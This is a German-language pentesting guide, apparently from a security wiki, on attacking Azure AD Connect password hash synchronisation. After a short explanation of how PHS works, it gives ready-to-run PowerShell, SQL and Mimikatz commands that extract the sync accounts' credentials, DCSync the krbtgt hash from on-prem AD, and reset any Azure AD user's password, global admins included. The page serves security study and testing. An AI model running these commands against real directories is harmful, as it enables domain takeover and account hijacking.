Grundlegende Informationen

Aus den Dokumenten: Die Passwort-Hash-Synchronisierung ist eine der Anmeldeverfahren, die zur Realisierung einer hybriden Identität verwendet werden. Azure AD Connect synchronisiert einen Hash, eines Hashes, des Passworts eines Benutzers von einer lokalen Active Directory-Instanz zu einer cloudbasierten Azure AD-Instanz.

Es ist die häufigste Methode, die von Unternehmen verwendet wird, um ein lokales AD mit Azure AD zu synchronisieren.

Alle Benutzer und ein Hash der Passworthashes werden vom lokalen AD mit Azure AD synchronisiert. Klartextpasswörter oder die ursprünglichen Hashes werden jedoch nicht an Azure AD gesendet. Darüber hinaus werden eingebaute Sicherheitsgruppen (wie Domänenadministratoren...) nicht mit Azure AD synchronisiert.

Die Hash-Synchronisierung erfolgt alle 2 Minuten. Standardmäßig werden jedoch Passwortablauf und Kontoablauf nicht in Azure AD synchronisiert. Daher kann ein Benutzer, dessen lokales Passwort abgelaufen ist (nicht geändert), weiterhin auf Azure-Ressourcen zugreifen, indem er das alte Passwort verwendet.

Wenn ein Benutzer aus dem lokalen AD auf eine Azure-Ressource zugreifen möchte, erfolgt die Authentifizierung in Azure AD.

PHS ist für Funktionen wie Identity Protection und AAD-Domänendienste erforderlich.

Pivoting

Wenn PHS konfiguriert ist, werden automatisch einige privilegierte Konten erstellt:

• Das Konto MSOL_<Installations-ID> wird automatisch im lokalen AD erstellt. Diesem Konto wird die Rolle Directory Synchronization Accounts zugewiesen (siehe Dokumentation), was bedeutet, dass es Replikationsberechtigungen (DCSync) im lokalen AD hat.

• Ein Konto Sync_<Name des lokalen ADConnect-Servers>_Installations-ID wird in Azure AD erstellt. Dieses Konto kann das Passwort eines beliebigen Benutzers (synchronisiert oder nur in der Cloud) in Azure AD zurücksetzen.

Die Passwörter der beiden zuvor genannten privilegierten Konten werden in einem SQL-Server auf dem Server, auf dem Azure AD Connect installiert ist, gespeichert. Admins können die Passwörter dieser privilegierten Benutzer im Klartext extrahieren. Die Datenbank befindet sich in C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf.

Es ist möglich, die Konfiguration aus einer der Tabellen zu extrahieren, wobei eine verschlüsselt ist:

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

Die verschlüsselte Konfiguration ist mit DPAPI verschlüsselt und enthält die Passwörter des Benutzers MSOL_* im lokalen AD und das Passwort von Sync_* in AzureAD. Daher ist es möglich, durch Kompromittierung dieser Berechtigungen auf das AD und AzureAD zu eskalieren.

Eine vollständige Übersicht darüber, wie diese Anmeldeinformationen gespeichert und entschlüsselt werden, finden Sie in diesem Vortrag.

Ermitteln des Azure AD Connect-Servers

Wenn der Server, auf dem Azure AD Connect installiert ist, domänenbeigetreten ist (wie in den Dokumenten empfohlen), ist es möglich, ihn mit zu finden:

# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

Missbrauch von MSOL_*

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

Missbrauch von Sync_*

Durch Kompromittierung des Sync_*-Kontos ist es möglich, das Passwort eines beliebigen Benutzers zurückzusetzen (einschließlich globaler Administratoren)

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

Es ist auch möglich, die Passwörter nur von Cloud-Benutzern zu ändern (auch wenn das unerwartet ist)

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

Es ist auch möglich, das Passwort dieses Benutzers abzurufen.

Nahtlose SSO

Es ist möglich, Seamless SSO mit PHS zu verwenden, was anfällig für andere Missbräuche ist. Überprüfen Sie dies unter:

Referenzen

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs

• https://aadinternals.com/post/on-prem_admin/

• https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf

• https://www.youtube.com/watch?v=xei8lAPitX8